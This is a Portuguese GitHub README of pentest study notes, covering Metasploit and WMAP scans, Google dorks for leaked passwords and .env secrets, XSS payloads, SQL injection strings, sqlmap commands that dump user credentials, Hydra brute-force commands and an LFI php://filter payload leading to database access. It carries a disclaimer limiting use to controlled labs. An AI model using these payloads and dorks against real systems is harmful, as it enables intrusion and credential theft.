Skip to content

Dicas e documentações sobre pentests para fins de estudo

Notifications You must be signed in to change notification settings

gustavogsec/pentests-tools

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Laboratórios com desafios

VM Kali

Navegadores:

VPN (Anonimato):

Email (Anonimato):

Ferramentas:

  • Burp Suite - Interceptação de requests

  • Extensão Cookie Manager - Verificar e editar cookies de sites

  • Extensão Wappalyzer - Verificar tecnologias em sites

  • OSINT - Coletar informações de fontes abertas

  • wapiti - scanear sites e gerar relatórios

    Quando usar o Burp Suite configurar o navegador com o prox: 127.0.0.1 e adicionar o certificado do http:https://burp

Android Hack Store:

  • F-droid: Termux: Aplicativo para acesso ao root Android

Exploits:

CAPTCHA BROKEN:

  1. Captcha de equação
  • Para executar:
    python3 captcha_de_equacao.py
    
  1. Captcha de imagem
  • Instale o tesseract-ocr - que é uma ferramenta de reconhecimento óptico de caracteres que usa inteligência artificial, com o comando:

    sudo apt-get install tesseract-ocr
    
  • Entre dentro da pasta onde está os arquivos de usuários e senhas. E para executar, rode o comando no terminal:

    bash ocr.sh
    

Metasploit (Canivete Suíço):

  • Framework para verificar a segurança em aplicações web e redes. Documentação
  1. Acesse o Metasploit na aba 8 - Explotation Tools

  2. Usando comandos auxiliares, digite o comando:

use auxiliary
  1. Vá navegando nas pastas:
use auxiliary/scanner/http
  1. Chegando no arquivo fim, rode o comando, para verificar as opções de exploração:
show options
  1. Nas opções: RHOSTS indicaremos o host, então digite o comando:
set RHOSTS IP_DO_HOST (Para verificar o IP, basta pingar a página)
  1. No TARGETURI / indicaremos uma pasta
set TARGETURI /joomal
  1. Para rodar o scaneamento, digite o comando:
run
  1. Para voltar ao inicio, digite o comando:
back
  1. Para scannear diretórios através de uma brute force:
use auxiliary/scanner/http/brute_dirs
  • Veja as opções de exploração e set o host e o root:
set PATH /pasta_da_aplicacao
set RHOSTS IP_do_HOST
  • Depois execute o scaneamento:
run

WMAP

  • É um plugin do Metasploit que faz uma varredura por todas as vulnerabilidades de uma aplicação web. Para executá-lo, basta executar no terminal do Metasploit:
load wmap
  • Depois precisamos criar o site para ele fazer a busca:
wmap_sites -a IP_DO_SITE
  • Para indicar a página da aplicação (target uri) em que vamos realizar a busca:
wmap_targets -t http:https://IP_DO_SITE/pasta_raiz_da_aplicação/
  • Para executar o scaner:
wmap_run -t

Esse processo é um pouco demorado, pois ele faz uma varredura por toda aĺicação

  • Para executar todos os módulos que ele retorna:
wmap_run -e

É um processo que demora um pouco também

Pesquisando dados vazados no Google:

site:pastebin.com OR site:paste2.org intext:EMAIL intext:PASSWORD | SENHA
filetype:doc "senha" intext:@gmail.com | @hotmail.com | @yahoo.com | @uol.com
filetype:txt "senha" intext:@gmail.com | @hotmail.com | @yahoo.com | @uol.com
filetype:doc | filetype:docx | filetype:txt | filetype:xls | filetype:pdf
"a senha é" intext:@gmail.com | @hotmail.com | @yahoo.com
filetype:env intext:DB_PASSWORD | intext:AWS_SECRET_ACCESS_KEY | intext:MAIL_PASSWORD | intext:API_SECRET

Devido ao quantidade de pesquisas, você pode tomar um strike do google temporariamente

Códigos XSS

  1. XSS persistido, inserido em uma textarea, para mostrar uma imagem como comentário
  <script>
  document.body.innerHTML="";
  var imagem=new Image();
  imagem.src="url_da_imagem";
  document.body.appendChild(imagem);
  </script>
  1. XSS na url
<img src="/resources/images/tracker.gif?searchTerms="" <svg onload=alert(1)> // ">

Sql Inject:

  1. Sabendo apenas o nome do usuário, e ignorando a senha:
    administrator'--
    
  2. Passando Sql Inject pela url para retornar os usuários e senhas na página:
    category=produto' UNION SELECT username, password FROM users --
    

Comandos do SqlMap:

  1. Irá mostrar todos os bancos de dados que a aplicação trabalha
sqlmap -u https://www.ecommerce.com --dbs
  1. Para explorar as tabelas de um banco na aplicação
sqlmap -u https://www.ecommerce.com -D nome_do_banco tables
  1. Para explorar uma tabelas no banco na aplicação
sqlmap -u https://ecommerce.com.br/?filter/caterory=product -T nome_da_tabela --columns
  1. Ver dados de registros de uma tabela no banco
sqlmap -u https://www.ecommerce.com/filter?category=product -D nome_do_banco -T nome_da_tabela --columns "campo1, campo2" --dump
  1. Para ver os dados dos adminstradores do banco e seus privilegios
sqlmap -u https://www.ecommerce.com/filter?category=product --current-user --is-dba --users --passwords --privileges
  1. Melhorando a performance da consulta acima com as flags batch (para passar em todas perguntas) e threads (para limitar as requesições):
sqlmap -u https://www.ecommerce.com/filter?category=product --current-user --is-dba --users --passwords --privileges --batch --threads 5
  1. Quando se conhece o banco, pode-se ainda acelerar mais o desempenho da consulta
sqlmap -u https://www.ecommerce.com/filter?category=product --current-user --is-dba --users --passwords --privileges --batch --threads 5 --dmbs tecnologia_do_banco
  1. Para testar todos os parâmetros da aplicação, quando não se passa nenhum filtro:
sqlmap -u https://www.ecommerce.com/ --crawl=2 --batch

9.Esse exemplo está passando uma url com parâmetro para o sqlmap a fim de baixar os dados da base de dados mutillidae, tabela accounts e colunas username, password e is_admin para visualizar os dados de usuários, senhas e administrador

sqlmap -u "http:https://10.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=123456&user-info-php-submit-button=View+Account+Details" --batch --dbms mysql --os linux --threads 3 -D mutillidae -T accounts -C "username,password,is_admin" --dump

Bruta Force:

  1. Descobrindo usuários cadastrados com a ferramenta Hydra
  • Na pasta onde estiver seu arquivo de usuários .txt abra um terminal e digite o comando:
 hydra -L users.txt -p senha-qualquer "localhost" http-form-post "/labs/bruteforce1/index.php:username=^USER^&password=^PASS^:S=Senha incorreta"
  • A ferramenta hydra vai testar se cada usuário do arquivo users.txt é válido para aquele formulário passando uma senha-qualquer.
  1. Descorbindo a senha cadastrada com o usuário correto:
    hydra -l usuario_correto -P passwords.txt "localhost" http-form-post "/labs/bruteforce1/index.php:username=^USER^&password=^PASS^:Senha incorreta" 
    

O maiúsculo das letras indica onde será feito a busca dinâmicamente

Ataque LFI(Local File Inclusion)

  1. Trazendo o código de uma página php, através do PHP Wrapper.

  2. Coloque o endereço IP do site mais o conteúdo:

    http:https://IP_DO_SITE/?page=php:https://filter/convert.base64-encode/resource=config
    
  3. A página retornará um token.

  4. Utilize o Burp Suite, para decifrar esse token, através do decode.

  5. Cole o token, e escolha a opção Decode as Base64

  6. Para acessar o banco da aplicação:

    mysql -h ENDEREÇO_DE_IP -u root -p
    
  7. Para ver o banco de dados da aplicação:

    show databases;
    
  8. Acessar a base de dados dos usuários:

    use Users;
    
  9. Para verificar quantas tabelas existem nessa base de dados:

    show tables;
    
  10. Listando tudo na tabela:

select * from nome_da_tabela;
  1. Para desencriptar as senhas, use o decoder do Burp suite.

  2. Após conseguir fazer login na página, é o momento de executar um web shell.

Criando relatórios de pentests:

Bibliografias

Atenção:

  • Esse repositório, uso apenas para fins de estudos em ambientes controlados.
  • Ou nas minhas aplicações para verificar a segurança.
  • Não me responsabilizo por ações de terceiros

About

Dicas e documentações sobre pentests para fins de estudo

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published